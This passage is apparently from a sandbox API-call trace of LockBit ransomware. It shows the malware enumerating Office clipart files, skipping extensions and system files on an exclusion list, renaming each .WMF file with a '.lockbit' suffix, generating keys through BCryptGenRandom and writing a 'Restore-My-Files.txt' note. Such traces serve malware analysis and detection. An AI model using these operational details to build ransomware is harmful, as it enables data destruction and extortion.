hTemplateFile=0x0) returned 0xffffffff [0138.414] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56321b30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x1600, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105232.WMF", cAlternateFileName="")) returned 1 [0138.414] lstrcmpiW (lpString1=".", lpString2="J0105232.WMF") returned -1 [0138.414] lstrcmpiW (lpString1="..", lpString2="J0105232.WMF") returned -1 [0138.414] PathFindExtensionW (pszPath="J0105232.WMF") returned=".WMF" [0138.414] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.414] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.414] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.414] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.414] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.414] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.414] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.414] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.414] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.414] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.414] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.414] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.414] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.414] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.415] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.415] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.415] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.415] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.415] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.415] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.415] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.415] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.415] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.415] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.415] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.415] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.415] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.415] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.415] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.415] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.415] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.415] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.415] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.415] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.415] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.416] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.416] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.416] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.416] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.416] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.416] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.416] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.416] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.416] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.416] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.416] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.416] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.416] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0105232.WMF") returned 1 [0138.416] lstrcmpiW (lpString1="ntldr", lpString2="J0105232.WMF") returned 1 [0138.416] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105232.WMF") returned 1 [0138.416] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105232.WMF") returned -1 [0138.416] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105232.WMF") returned -1 [0138.416] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105232.WMF") returned 1 [0138.416] lstrcmpiW (lpString1="iconcache.db", lpString2="J0105232.WMF") returned -1 [0138.416] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.416] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105232.WMF") returned=".WMF" [0138.417] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.417] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.417] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.417] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.417] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.417] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.417] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.417] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.417] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.417] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.417] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.417] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.417] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.417] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.417] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.417] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.417] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.417] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.417] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.417] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.417] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.418] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.418] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.418] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.418] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.418] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.418] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.418] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.418] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105232.WMF.lockbit") returned 72 [0138.418] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105232.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105232.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xec [0138.423] CreateIoCompletionPort (FileHandle=0xec, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.423] malloc (_Size=0x40068) returned 0x1ff1e60 [0138.423] GetFileSizeEx (in: hFile=0xec, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=5632) returned 1 [0138.423] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.424] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.424] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0138.424] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.424] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.425] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0138.425] ReadFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0138.428] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105232.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105232.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.428] malloc (_Size=0xa6) returned 0x77d7a8 [0138.428] NtSetInformationFile (FileHandle=0xec, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0138.429] free (_Block=0x77d7a8) [0138.429] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105232.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.429] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.429] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.429] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65e1cad0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xd74, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105234.WMF", cAlternateFileName="")) returned 1 [0138.429] lstrcmpiW (lpString1=".", lpString2="J0105234.WMF") returned -1 [0138.429] lstrcmpiW (lpString1="..", lpString2="J0105234.WMF") returned -1 [0138.429] PathFindExtensionW (pszPath="J0105234.WMF") returned=".WMF" [0138.429] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.429] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.429] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.429] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.430] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.430] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.430] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.430] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.430] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.430] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.430] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.430] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.430] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.430] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.430] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.430] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.430] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.430] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.430] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.430] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.430] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.430] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.430] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.430] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.430] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.430] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.431] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.431] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.431] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.431] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.431] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.431] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.431] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.431] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.431] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.431] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.431] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.431] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.431] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.431] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.431] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.431] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.431] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.431] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.431] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.431] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.431] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.431] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0105234.WMF") returned 1 [0138.432] lstrcmpiW (lpString1="ntldr", lpString2="J0105234.WMF") returned 1 [0138.432] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105234.WMF") returned 1 [0138.432] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105234.WMF") returned -1 [0138.432] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105234.WMF") returned -1 [0138.432] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105234.WMF") returned 1 [0138.432] lstrcmpiW (lpString1="iconcache.db", lpString2="J0105234.WMF") returned -1 [0138.432] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.432] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105234.WMF") returned=".WMF" [0138.432] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.432] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.432] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.432] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.432] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.432] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.432] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.432] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.432] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.432] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.432] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.432] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.432] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.433] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.433] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.433] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.433] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.433] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.433] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.433] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.433] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.433] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.433] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.433] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.433] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.433] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.433] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.433] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.433] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105234.WMF.lockbit") returned 72 [0138.433] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105234.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105234.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0138.438] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.438] malloc (_Size=0x40068) returned 0x3d70450 [0138.438] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=3444) returned 1 [0138.438] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.439] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.439] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0138.439] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.439] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.439] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0138.439] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0138.442] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105234.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105234.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.442] malloc (_Size=0xa6) returned 0x77d7a8 [0138.442] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0138.446] free (_Block=0x77d7a8) [0138.446] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105234.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.446] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.446] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.446] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56321b30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4314, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105238.WMF", cAlternateFileName="")) returned 1 [0138.446] lstrcmpiW (lpString1=".", lpString2="J0105238.WMF") returned -1 [0138.446] lstrcmpiW (lpString1="..", lpString2="J0105238.WMF") returned -1 [0138.446] PathFindExtensionW (pszPath="J0105238.WMF") returned=".WMF" [0138.446] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.446] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.446] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.446] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.446] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.446] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.446] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.446] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.446] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.446] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.447] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.447] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.447] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.447] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.447] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.447] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.447] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.447] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.447] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.447] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.447] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.447] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.447] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.447] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.447] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.447] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.447] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.447] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.447] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.447] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.447] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.447] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.447] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.448] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.448] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.448] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.448] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.448] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.448] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.448] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.448] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.448] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.448] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.448] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.448] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.448] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.448] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.448] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0105238.WMF") returned 1 [0138.448] lstrcmpiW (lpString1="ntldr", lpString2="J0105238.WMF") returned 1 [0138.448] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105238.WMF") returned 1 [0138.448] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105238.WMF") returned -1 [0138.448] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105238.WMF") returned -1 [0138.448] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105238.WMF") returned 1 [0138.448] lstrcmpiW (lpString1="iconcache.db", lpString2="J0105238.WMF") returned -1 [0138.448] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.449] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105238.WMF") returned=".WMF" [0138.449] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.449] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.449] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.449] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.449] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.449] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.449] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.449] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.449] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.449] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.449] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.449] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.449] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.449] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.449] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.449] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.449] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.449] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.449] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.449] lstrcmpiW 